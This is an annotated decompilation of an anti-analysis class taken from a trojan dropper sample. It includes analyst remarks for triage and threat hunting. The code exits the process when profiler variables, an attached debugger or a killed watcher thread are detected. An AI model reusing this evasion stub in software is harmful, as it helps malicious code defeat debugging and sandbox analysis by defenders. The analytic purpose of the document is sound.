// Decompiled with JetBrains decompiler
// Type: 倍鄻<E984BB>聍˵ꆬ
// Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null
// MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Threading;
/// <summary>
/// Anti-analysis guard recovered from the decompiled sample: it terminates the process when
/// CLR profiler environment variables are set, or when a managed debugger is attached or logging.
/// </summary>
/// <remarks>
/// Analyst notes:
/// - Every exit path goes through Environment.FailFast with a fixed message ("Profiler detected",
///   "Debugger detected (Managed)", "Loop broken"). On Windows, FailFast reports its message to the
///   Application event log, so these strings are usable for triage and hunting.
/// - A sandbox or instrumentation layer that sets COR_ENABLE_PROFILING or COR_PROFILER will only
///   observe the immediate exit, not the rest of the sample's behaviour.
/// - The messages and layout look like a stock obfuscator anti-debug stub rather than code written
///   for this sample. TODO confirm against known protector runtimes.
/// - Private members carry readable names here; the class and entry-point names are kept exactly
///   as the decompiler emitted them.
/// </remarks>
internal static class 倍鄻\u2D97\uFFFD\uEF6C聍\u02F5ꆬ
{
    // Native imports. None of the three is called anywhere in this class, so whether the sample
    // uses a native (ntdll-based) check elsewhere cannot be told from this listing.
    // PreserveSig = false makes the marshaller treat the native return value as an HRESULT,
    // which is unusual for these APIs. NOTE(review): may be an obfuscator or decompiler artefact.
    [DllImport("ntdll.dll", EntryPoint = "NtQueryInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
    private static extern int NtQueryInformationProcess(
        IntPtr ProcessHandle,
        int ProcessInformationClass,
        byte[] ProcessInformation,
        uint ProcessInformationLength,
        out int ReturnLength);

    [DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
    private static extern uint NtSetInformationProcess(
        IntPtr ProcessHandle,
        int ProcessInformationClass,
        byte[] ProcessInformation,
        uint ProcessInformationLength);

    [DllImport("kernel32.dll", EntryPoint = "CloseHandle", PreserveSig = false)]
    private static extern bool CloseHandle(IntPtr hObject);

    /// <summary>
    /// Entry point of the guard: performs the one-shot profiler check, then starts two background
    /// threads that each poll for a debugger and for the other thread's liveness.
    /// </summary>
    public static void 鈧렠\u1AF4鱛렪뜾㶘䄋()
    {
        // Presence-only test: any non-null value of either variable counts as "profiler".
        // The second variable is read only when the first one is absent.
        bool profilerConfigured =
            Environment.GetEnvironmentVariable("COR_ENABLE_PROFILING") != null
            || Environment.GetEnvironmentVariable("COR_PROFILER") != null;
        if (profilerConfigured)
        {
            Environment.FailFast("Profiler detected");
        }

        // Two watchers running the same routine; each receives the other as its argument.
        // Background threads do not keep the process alive on their own.
        Thread firstWatcher = new Thread(WatchPeer) { IsBackground = true };
        Thread secondWatcher = new Thread(WatchPeer) { IsBackground = true };

        firstWatcher.Start(secondWatcher);
        // The second watcher starts 500 ms later; the first one's initial 1000 ms sleep covers
        // that gap, so its peer is normally alive by the time it is first checked.
        Thread.Sleep(500);
        secondWatcher.Start(firstWatcher);
    }

    /// <summary>
    /// Watcher loop: about once per second, fail fast if a managed debugger is attached or
    /// logging, or if the peer thread passed in <paramref name="thread"/> is no longer alive.
    /// </summary>
    /// <param name="thread">The peer <see cref="Thread"/> to monitor, boxed as object.</param>
    private static void WatchPeer(object thread)
    {
        Thread.Sleep(1000);
        Thread peer = (Thread) thread;

        for (;;)
        {
            if (Debugger.IsAttached || Debugger.IsLogging())
            {
                Environment.FailFast("Debugger detected (Managed)");
            }

            // Mutual liveness check: a watcher that finds its peer no longer alive
            // (for example, killed) ends the process.
            if (!peer.IsAlive)
            {
                Environment.FailFast("Loop broken");
            }

            Thread.Sleep(1000);
        }
    }
}